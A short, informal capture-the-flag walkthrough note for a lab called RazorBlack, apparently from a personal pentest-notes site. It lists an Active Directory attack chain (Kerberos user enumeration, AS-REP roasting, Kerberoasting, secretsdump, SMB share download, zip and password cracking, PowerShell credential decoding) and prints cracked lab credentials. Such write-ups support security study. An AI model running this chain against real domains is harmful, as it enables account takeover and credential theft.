RazorBlack

 ./kerbrute_linux_386 userenum  -d raz0rblack.thm --dc 10.10.241.105    users.txt

Pentest_Notes | 0Sech3ckt0r.gitbook.io

showmount -e 10.10.241.105

i open exel file i found users

REP-REPOSTING

impacket-GetNPUsers raz0rblack.thm/ -dc-ip 10.10.194.110  -usersfile users.txt -format john -outputfile crackme.txt -no-pass -request

user cracked

twilliams:roastpotatoes

Targeted Kerberoast

impacket-GetUserSPNs raz0rblack.thm/twilliams:roastpotatoes -dc-ip 10.10.35.193 -request

xyan1d3:cyanide9amine5628

i found a local domain user made secretsdump

xyan1d3.xml

01000000d08c9ddf0115d1118c7a00c04fc297eb010000006bc3424112257a48aa7937963e14ed790000000002000000000003660000c000000010000000f098beb903e1a489eed98b779f3c70b80000000004800000a000000010000000e59705c44a560ce4c53e837d111bb39970000000feda9c94c6cd1687ffded5f438c59b080362e7e2fe0d9be8d2ab96ec7895303d167d5b38ce255ac6c01d7ac510ef662e48c53d3c89645053599c00d9e8a15598e8109d23a91a8663f886de1ba405806944f3f7e7df84091af0c73a4effac97ad05a3d6822cdeb06d4f415ba19587574f1400000051021e80fd5264d9730df52d2567cd7285726da2

impacket-smbpasswd sbradley@10.10.108.185

Smbmap to show sharing file

 smbmap -H 10.10.108.185 -u 'sbradley' -p '1234@Asd' -r trash --download trash/experiment_gone_wrong.zip

zip2jon file.zip > ziphash
 john ziphash  --wordlist=/usr/share/wordlists/rockyou.txt

$Credential = Import-Clixml -Path "root.xml"
$Credential.GetNetworkCredential().password

Import-Clixml -Path "xyan1d3.xml": This command imports data from an XML file named "xyan1d3.xml". The XML file should contain a serialized PSCredential object. This method is commonly used for securely storing and retrieving credentials.

Convert SecureString to Plain Text (if absolutely necessary, but not recommended due to security concerns):

PreviousmKingdom NextModule 1 (General Info)

Last updated 1 year ago